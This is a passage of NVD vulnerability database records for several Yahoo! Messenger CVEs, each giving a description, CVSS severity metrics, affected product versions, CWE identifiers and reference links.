              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method.  NOTE: some of these details are obtained from third party information."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer en el control Yahoo! Webcam Upload ActiveX en ywcupl.dll versi\u00f3n 2.0.1.4 para Yahoo! Messenger versi\u00f3n 8.1.0.249 permite a los atacantes remotos ejecutar c\u00f3digo arbitrario por medio de un valor largo propiedad del servidor para el m\u00e9todo de env\u00edo. NOTA: algunos de estos datos se consiguen de la informaci\u00f3n de terceros."
    }
  ],
  "id": "CVE-2007-3147",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.3,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 10.0,
        "obtainAllPrivilege": true,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2007-06-11T18:30:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://messenger.yahoo.com/security_update.php?id=060707"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25547"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securityreason.com/securityalert/2809"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1018204"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/949817"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/24341"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/24354"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1018203"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2007/2094"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://www.exploit-db.com/exploits/4042"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://messenger.yahoo.com/security_update.php?id=060707"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25547"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securityreason.com/securityalert/2809"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1018204"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/949817"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/24341"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/24354"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1018203"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2007/2094"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.exploit-db.com/exploits/4042"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2002-12-31 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger before February 2002 allows remote attackers to add arbitrary users to another user's buddy list and possibly obtain sensitive information.
Impacted products
Vendor Product Version
yahoo messenger 5.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Yahoo! Messenger before February 2002 allows remote attackers to add arbitrary users to another user\u0027s buddy list and possibly obtain sensitive information."
    }
  ],
  "id": "CVE-2002-1664",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 6.4,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2002-12-31T05:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/393195"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/393195"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-08-31 22:17
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information.
Impacted products
Vendor Product Version
yahoo messenger * (up to and including 8.1.0.413)



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "28CF8D81-8299-4EC7-B3A6-E08B57786CB8",
              "versionEndIncluding": "8.1.0.413",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods.  NOTE: some of these details are obtained from third party information."
    },
    {
      "lang": "es",
      "value": "Un desbordamiento de b\u00fafer en cierto control ActiveX en YVerInfo.dll versiones anteriores a  2007.8.27.1 en la conjunto de servicios para Yahoo! para Yahoo! Messenger versiones anteriores a  8.1.0.419,  permite a atacantes remotos ejecutar c\u00f3digo arbitrario por medio  de vectores no especificados que involucran argumentos en los m\u00e9todos (1) fvCom y (2) info. NOTA: algunos de estos datos son obtenidos a partir de informaci\u00f3n de terceros."
    }
  ],
  "id": "CVE-2007-4515",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.3,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 10.0,
        "obtainAllPrivilege": true,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-08-31T22:17:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://messenger.yahoo.com/security_update.php?id=082907"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/37739"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/26579"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securityreason.com/securityalert/3083"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1018628"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/25494"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2007/3011"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://messenger.yahoo.com/security_update.php?id=082907"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/37739"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/26579"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securityreason.com/securityalert/3083"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1018628"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/25494"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2007/3011"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-08-31 23:17
Modified
2025-04-09 00:30
Severity ?
Summary
Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Impacted products
Vendor Product Version
yahoo messenger 8.1.0.209
yahoo messenger 8.1.0.402



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.209:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A9243F4-ADE8-4B7A-A195-EEAD41FF14EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.402:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6CB6D1A-E1A2-4E1C-9E02-24A192D72750",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe.  NOTE: this might be related to CVE-2007-4515.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
    },
    {
      "lang": "es",
      "value": "Yahoo! Messenger 8.1.0.209 y 8.1.0.402 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (ca\u00edda de aplicaci\u00f3n) mediante determinados paquetes de transferencia de fichero, posiblemente involucrando un desbordamiento de b\u00fafer, como se demuestra con ym8bug.exe.\r\nNOTA: Esto podr\u00eda estar relacionado con CVE-2007-4515.\r\nNOTA: El origen de esta informaci\u00f3n es desconocido; los detalles se han obtenido solamente de informaci\u00f3n de terceros."
    }
  ],
  "id": "CVE-2007-4635",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-08-31T23:17:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/25484"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/25484"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        },
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2005-05-16 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
The YMSGR URL handler in Yahoo! Messenger 5.x through 6.0 allows remote attackers to cause a denial of service (disconnect) via a room login or a room join request packet with a third : (colon) and an & (ampersand), which causes Messenger to send a corrupted packet to the server, which triggers a disconnect from the server.
Impacted products
Vendor Product Version
yahoo messenger 5.5
yahoo messenger 5.6
yahoo messenger 6.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The YMSGR URL handler in Yahoo! Messenger 5.x through 6.0 allows remote attackers to cause a denial of service (disconnect) via a room login or a room join request packet with a third : (colon) and an \u0026 (ampersand), which causes Messenger to send a corrupted packet to the server, which triggers a disconnect from the server."
    }
  ],
  "id": "CVE-2005-1618",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2005-05-16T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=111601904204055\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/16816"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/13626"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=111601904204055\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/16816"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/13626"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2015-09-11 20:59
Modified
2025-04-12 10:46
Severity ?
Summary
Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file.
Impacted products
Vendor Product Version
yahoo messenger * (up to and including 11.5.0.228)



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "23A70298-F578-4534-A093-AE997FAB3BFC",
              "versionEndIncluding": "11.5.0.228",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples desbordamientos de buffer basado en pila en Yahoo! Messenger 11.5.0.228 y versiones anteriores, permite a atacantes remotos causar una denegaci\u00f3n de servicio (colapso) y posiblemente ejecutar c\u00f3digo arbitrario a trav\u00e9s del (1) acceso directo o de (2) las claves de t\u00edtulo en un archivo emoticons.xml."
    }
  ],
  "id": "CVE-2014-7216",
  "lastModified": "2025-04-12T10:46:40.837",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.3,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2015-09-11T20:59:00.100",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://seclists.org/fulldisclosure/2015/Sep/24"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id/1033544"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://hackerone.com/reports/10767"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://seclists.org/fulldisclosure/2015/Sep/24"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id/1033544"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://hackerone.com/reports/10767"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-09-20 21:17
Modified
2025-04-09 00:30
Severity ?
Summary
Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method.
Impacted products
Vendor Product Version
yahoo messenger 8.1.0.421



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.421:*:*:*:*:*:*:*",
              "matchCriteriaId": "661E07A2-FB77-4411-95B3-BD0ED72DC6B3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de escalado de rutas absolutas en ciertos controles de ActiveX en el objeto CYFT del ft60.dll del Yahoo! Messenger 8.1.0.421 permite a atacantes remotos forzar una descarga y crear o sobrescribir ficheros de su elecci\u00f3n a trav\u00e9s de un nombre de ruta completa como segundo argumento del m\u00e9todo GetFile."
    }
  ],
  "id": "CVE-2007-5017",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-09-20T21:17:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/38296"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/25727"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1018715"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://www.exploit-db.com/exploits/4428"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/38296"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/25727"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1018715"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.exploit-db.com/exploits/4428"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2009-12-02 19:30
Modified
2025-04-09 00:30
Severity ?
Summary
An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument.
Impacted products
Vendor Product Version
yahoo messenger 9.0.0.2162



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2162:*:*:*:*:*:*:*",
              "matchCriteriaId": "6A1FEC40-A9EA-44AF-9DF3-1F85E1DDE4FF",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument."
    },
    {
      "lang": "es",
      "value": "Un control ActiveX en YahooBridgeLib.dll para Yahoo! Messenger v9.0.0.2162, y posiblemente otras versiones 9.0, permite a atacantes remotos producir una denegaci\u00f3n de servicio (desreferencia a un puntero NULL y ca\u00edda de aplicaci\u00f3n ) mediante una llamada al m\u00e9todo RegisterMe con un argumento largo."
    }
  ],
  "id": "CVE-2009-4171",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
